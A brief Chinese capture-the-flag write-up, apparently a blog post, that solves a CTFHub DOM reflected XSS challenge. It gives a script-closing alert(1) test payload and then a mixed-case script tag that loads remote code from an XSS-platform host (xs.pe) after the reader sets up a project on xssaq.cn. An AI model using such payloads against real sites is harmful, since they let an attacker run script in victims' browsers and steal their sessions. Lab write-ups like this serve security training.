根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
Insseals14 分钟前
因斯特浮动模块快速接头✨五大核心优势沐土Arvin31 分钟前
港澳台行政区域json程序员鱼皮1 小时前
我花 300 块,让 Claude Fable 5 开发桌面 APP,值么?William_Xu1 小时前
JavaScript 并发控制拾年2751 小时前
从零手写 Ajax:用原生 XHR 搭建前后端交互全流程光影少年1 小时前
懒加载与分包:React.lazy + Suspense小林ixn1 小时前
你以为你懂 + 号?看完这篇 Bun + TS 实战,才发现以前全写错了namexingyun2 小时前
开源前端生态如何成为 AI UI 生成的“燃料“:shadcn/ui、Tailwind CSS、Storybook 技术价值全解剖Zyed2 小时前
[STM32]Day15读写FLASH+读取IDjvxiao3 小时前
你真的懂作用域吗?从编译原理角度深度 JS 的作用域